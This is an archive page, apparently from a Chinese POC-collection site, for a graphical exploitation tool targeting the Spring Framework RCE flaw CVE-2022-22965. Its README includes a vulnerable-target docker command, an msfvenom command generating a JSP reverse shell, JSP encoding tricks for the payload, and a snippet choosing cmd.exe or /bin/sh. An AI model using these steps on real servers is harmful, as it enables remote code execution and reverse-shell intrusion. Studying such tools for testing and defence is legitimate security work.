POC详情: 43fdbc49d7728556929e7171826b3af6db6cc265

来源
关联漏洞
标题: Spring Framework 代码注入漏洞 (CVE-2022-22965)
描述:Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞,该漏洞源于 JDK 9+ 上的数据绑定的 RCE。以下产品和版本受到影响:5.3.0 至 5.3.17、5.2.0 至 5.2.19、较旧的和不受支持的版本也会受到影响。
描述
CVE-2022-22965图形化检测工具
介绍
靶机
```bash
docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest
```
反弹shell实质为参照msfvenom
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp
```
将jsp url编码后,用
```html
%3C%25替换 %25%7Bc2%7Di 代表<%
%25%3E 替换 %25%7Bsuffix%7Di 代表 %>
```
代码中针对不同类型服务器进行了shellpath的修改判断
```python
if self.radioButton_win.isChecked():
    shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
    shellpath = "/bin/sh"
```
命令执行:
![](img/cmd.png)
whoami探测:
![](img/whoami.png)
一键反弹shell
![](img/reverse.png)
文件快照

[4.0K] /data/pocs/43fdbc49d7728556929e7171826b3af6db6cc265 ├── [4.0K] build │   └── [4.0K] main │   ├── [ 51K] Analysis-00.toc │   ├── [1014K] base_library.zip │   ├── [ 19K] EXE-00.toc │   ├── [ 24K] generated-7306dd1d30b36496bfe797ae76329bb8d9f2282fd4a89aa02134b66de1c22e3a.ico │   ├── [4.0K] localpycs │   │   ├── [8.8K] pyimod01_archive.pyc │   │   ├── [ 17K] pyimod02_importers.pyc │   │   ├── [4.0K] pyimod03_ctypes.pyc │   │   ├── [ 717] pyimod04_pywin32.pyc │   │   └── [ 285] struct.pyc │   ├── [1.4K] main.exe.manifest │   ├── [ 43M] main.pkg │   ├── [ 17K] PKG-00.toc │   ├── [1.5M] PYZ-00.pyz │   ├── [ 34K] PYZ-00.toc │   ├── [3.6K] warn-main.txt │   └── [504K] xref-main.html ├── [4.0K] dist │   ├── [6.9K] hackaday.png │   └── [ 44M] main.exe ├── [6.9K] hackaday.png ├── [4.0K] img │   ├── [119K] cmd.png │   ├── [320K] reverse.png │   └── [112K] whoami.png ├── [ 659] main.py ├── [ 829] main.spec ├── [ 15K] myui.py ├── [5.2K] myui.ui ├── [ 17K] p.ico ├── [4.0K] __pycache__ │   ├── [ 712] main.cpython-37.pyc │   └── [ 11K] myui.cpython-39.pyc └── [ 646] README.md 6 directories, 30 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。